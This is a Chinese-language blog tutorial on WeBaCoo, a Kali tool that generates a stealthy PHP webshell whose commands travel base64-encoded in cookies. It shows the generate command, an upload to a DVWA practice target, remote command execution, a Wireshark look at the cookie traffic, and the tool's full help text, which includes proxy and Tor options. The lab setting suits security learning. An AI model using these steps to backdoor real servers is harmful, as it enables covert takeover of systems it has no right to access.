kali中的webshell工具--webacoo

时间:2023-03-08 15:41:19

webacoo


webshell其实就是放置在服务器上的一段代码

kali中生成webshell的工具

WeBaCoo(Web Backdoor Cookie)

kali中的webshell工具--webacoo

特点及使用方法

  • 类终端的shell
  • 编码通信内容通过cookie头传输,隐蔽性强
  • cookie中传递数据使用的参数:
    • cm:base64编码的命令
    • cn:服务器用于返回数据的cookie头的名
    • cp:返回信息定界符
  • 生成服务端
    • Webacoo -g -o a.php
  • 客户端连接

生成一个webshell测试:

kali中的webshell工具--webacoo

查看文件内容可以看到是被base64加密的

kali中的webshell工具--webacoo

在DVWA靶机环境中上传该文件

kali中的webshell工具--webacoo

然后使用webacoo连接服务器

成功连接:

kali中的webshell工具--webacoo

可以直接执行系统命令:

kali中的webshell工具--webacoo

webacoo的隐蔽性高之一是因为他采用的是cookie传参,且为base64加密

接着使用wireshark抓包查看其cookie参数:

kali中的webshell工具--webacoo

这里cm选项中的字符串经过解码后就是我们传入的命令ls

kali中的webshell工具--webacoo

服务器端返回的setcookie中的M-cookie字段就是命令返回的结果,cp变量值为QXg@和M-cookie中的开头对应,为界定符。

这里的M-cookie可以在连接webshell时通过-c参数自定义:

kali中的webshell工具--webacoo

除此外,webacoo还可以在连接时使用-p选项,通过代理服务器连接目标服务器

更多参数可以通过webacoo -h查看帮助手册

 root@bogon:~# webacoo -h

     WeBaCoo 0.2. - Web Backdoor Cookie Script-Kit
Copyright (C) - Anestis Bechtsoudis
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com } Usage: webacoo [options] Options:
-g Generate backdoor code (-o is required) -f FUNCTION PHP System function to use
FUNCTION
: system (default)
: shell_exec
: exec
: passthru
: popen -o OUTPUT Generated backdoor output filename -r Return un-obfuscated backdoor code -t Establish remote "terminal" connection (-u is required) -u URL Backdoor URL -e CMD Single command execution mode (-t and -u are required) -m METHOD HTTP method to be used (default is GET) -c C_NAME Cookie name (default: "M-cookie") -d DELIM Delimiter (default: New random for each request) -a AGENT HTTP header user-agent (default exist) -p PROXY Use proxy (tor, ip:port or user:pass:ip:port) -v LEVEL Verbose level
LEVEL
: no additional info (default)
: print HTTP headers
: print HTTP headers + data -l LOG Log activity to file -h Display help and exit update Check for updates and apply if any